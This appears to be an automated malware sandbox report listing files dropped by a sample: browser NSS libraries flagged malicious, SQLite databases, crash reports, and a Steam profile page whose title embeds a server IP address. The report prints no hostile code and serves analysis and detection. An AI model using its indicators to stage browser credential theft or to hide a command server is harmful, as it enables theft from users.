                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\JJDBFC-shm

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):32768
                                                            Entropy (8bit):0.017262956703125623
                                                            Encrypted:false
                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                            Malicious:false
                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\JKEBFB

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):5242880
                                                            Entropy (8bit):0.03708713717387235
                                                            Encrypted:false
                                                            SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                                                            MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                                                            SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                                                            SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                                                            SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\JKEBFB-shm

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):32768
                                                            Entropy (8bit):0.017262956703125623
                                                            Encrypted:false
                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                            Malicious:false
                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\freebl3.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):685392
                                                            Entropy (8bit):6.872871740790978
                                                            Encrypted:false
                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: PxuZ1WpCgf.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: TEILll7BsZ.exe, Detection: malicious, Browse
                                                            • Filename: Pd3mM82Bs6.exe, Detection: malicious, Browse
                                                            • Filename: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, Detection: malicious, Browse
                                                            • Filename: QyvAWkfdLM.exe, Detection: malicious, Browse
                                                            • Filename: uBgwoHPWaf.exe, Detection: malicious, Browse
                                                            • Filename: QJqJic3hex.exe, Detection: malicious, Browse
                                                            • Filename: HeYgs7bTvy.exe, Detection: malicious, Browse
                                                            • Filename: 91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exe, Detection: malicious, Browse
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\mozglue.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):608080
                                                            Entropy (8bit):6.833616094889818
                                                            Encrypted:false
                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: PxuZ1WpCgf.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: TEILll7BsZ.exe, Detection: malicious, Browse
                                                            • Filename: Pd3mM82Bs6.exe, Detection: malicious, Browse
                                                            • Filename: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, Detection: malicious, Browse
                                                            • Filename: QyvAWkfdLM.exe, Detection: malicious, Browse
                                                            • Filename: QJqJic3hex.exe, Detection: malicious, Browse
                                                            • Filename: HeYgs7bTvy.exe, Detection: malicious, Browse
                                                            • Filename: 91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exe, Detection: malicious, Browse
                                                            • Filename: 3.exe, Detection: malicious, Browse
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\msvcp140.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):450024
                                                            Entropy (8bit):6.673992339875127
                                                            Encrypted:false
                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\nss3.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2046288
                                                            Entropy (8bit):6.787733948558952
                                                            Encrypted:false
                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\softokn3.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):257872
                                                            Entropy (8bit):6.727482641240852
                                                            Encrypted:false
                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):80880
                                                            Entropy (8bit):6.920480786566406
                                                            Encrypted:false
                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_5876.exe_bb83caaba8bfb67bcd28d62359ef968548a83a_8606972a_f768a413-62bc-4891-a9fa-1e0424f3e302\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.9898774483980706
                                                            Encrypted:false
                                                            SSDEEP:96:r7MAdVsZhqnFb7qnIfqBQXIDcQAc614cE2cw3VT+HbHg/8BRTf32rLOyKZzTvSEc:fBdVPUM0eeMZQjvPFBzuiF3Z24IO88s
                                                            MD5:786F63462E99D2BF3027FDBF4495F269
                                                            SHA1:34B52718B24DB9B0E1460150F7061B069B8A103D
                                                            SHA-256:DE4D918DE3DA1FB57AFD4DCA8357B0F4D92F7433BA69D2ECE16F09DEF89ED851
                                                            SHA-512:1D43AC807904FA36E8EDEF1276D8F4A492B5B16E05CBE387493DC583C662903A472C87D65C39B441D4D80303F4C48B7A727CBC15A6B13EA819F1E4295D3A0F38
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.2.8.9.8.5.2.6.4.3.9.1.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.2.8.9.8.5.3.0.9.7.0.3.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.6.8.a.4.1.3.-.6.2.b.c.-.4.8.9.1.-.a.9.f.a.-.1.e.0.4.2.4.f.3.e.3.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.6.f.4.6.d.f.-.3.5.9.c.-.4.d.1.0.-.a.6.2.a.-.0.e.8.b.5.8.0.8.8.7.3.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.8.7.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.3.8.-.0.0.0.1.-.0.0.1.4.-.2.0.1.f.-.5.c.1.3.3.9.b.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.7.f.3.4.f.4.8.d.7.7.1.c.9.8.9.b.7.8.b.6.e.1.3.f.f.9.b.e.c.4.6.0.0.0.0.f.f.f.f.!.0.0.0.0.4.6.e.8.9.a.f.e.b.6.1.c.1.d.0.8.5.2.4.1.2.4.8.0.e.e.2.0.2.d.4.8.c.7.d.5.a.c.e.b.!.5.8.7.6...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.5.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDB1.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 15 streams, Mon May 27 13:24:12 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):52808
                                                            Entropy (8bit):2.826690826202209
                                                            Encrypted:false
                                                            SSDEEP:384:3lW38Vr0B9TBcllisVbdo7oA6epJpjXlA:3lWo0B9TBcrbdM6Co
                                                            MD5:2E50EDEE7198D33D7A36C86808DA9FF2
                                                            SHA1:A922287D5961B13A065A6C4AE6DCFE97AAF1A25B
                                                            SHA-256:2CFE65C223CA8B53B4F95BA9CCE3AD95AF057ED7486CBB59C771A1F1CA841DE7
                                                            SHA-512:DEEFFE32663C027F241361C33478C532692BA5EE4222A03CFD2A4C11F6EBD9013097EDF26E6EF76AF7418E1E877F6E939A05A355FF8FA94F62B6A2BD3F33115D
                                                            Malicious:false
                                                            Preview:MDMP..a..... .......|.Tf............4...............H........................1..........`.......8...........T............=..X...........x ..........d"..............................................................................eJ......."......GenuineIntel............T.......8...V.Tf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE9D.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8286
                                                            Entropy (8bit):3.694957211953432
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJY66nv6YSfSUPgmffW2bpDp89bxlsfl+bm:R6lXJd6v6Y6SUPgmff3Ix+fZ
                                                            MD5:C8FDC58DE8E53FCBDE4EDB0D37AA8883
                                                            SHA1:30401CDFB22C4A31D0A0A292155C640C5FAE36EB
                                                            SHA-256:68D069DB4C002BB1B7B5DD0E99D46139E29D6BA4D7E358BA33A1C4D3ED0B9145
                                                            SHA-512:D49CCE966C2A0295AEF90E4D64083ECEE3BBE8F693C165309F416855907CDE012A39E442DFFD5052C338DCB361EDF20C33CCD23063F0F78C7058A96A785AA598
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.9.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREECC.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4537
                                                            Entropy (8bit):4.433164723806008
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsVJg77aI9ncWpW8VYBYm8M4JjdFIu+q8KUYwTm2Bgd:uIjfvI75V7VtJkuAYwTJBgd
                                                            MD5:6C1B396C28BA364712EDC55A278F2A1A
                                                            SHA1:5F987F91D3E26E34EC785FF4BB0596C22A6D6A15
                                                            SHA-256:E985BFA270750223B10BBAA3A16F0EF131186C1D0A4373119800B05612C698D4
                                                            SHA-512:C3CA54185E54CDB21BF73223520B32F28A5813D748DE91265330D90A63A89AF961F3F840CE8D0D3452DBCF4A2977D1A23D16451A65D24F5C6B87D5F9404AFF16
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="341546" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199689717899[1].htm

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                            Category:dropped
                                                            Size (bytes):35672
                                                            Entropy (8bit):5.380146966634901
                                                            Encrypted:false
                                                            SSDEEP:768:q7pqLtWYmwt5D0gqOSiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2S5:q78LtWYmwt5D0gqOSc7PzzgiJmDzJtx1
                                                            MD5:7B0EEDEC48F503315B5CF087431E0D0F
                                                            SHA1:4E7974CED987745BEC806059487A9FAEBF8316A2
                                                            SHA-256:5F0DFC751086A00F2A6FEE6BF23BECF777AFDE0FAD352CC27D746EB6AE5D7288
                                                            SHA-512:09E0E80CC504878E3661E110FFB41114F04F580A126349042FEBCBD576CBDE547E43267AB101E54467AF4B76F168C1A506B24A1BB63E8F84464DC35B6C0E2D20
                                                            Malicious:false
                                                            Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://37.27.34.12|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):685392
                                                            Entropy (8bit):6.872871740790978
                                                            Encrypted:false
                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):608080
                                                            Entropy (8bit):6.833616094889818
                                                            Encrypted:false
                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):450024
                                                            Entropy (8bit):6.673992339875127
                                                            Encrypted:false
                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
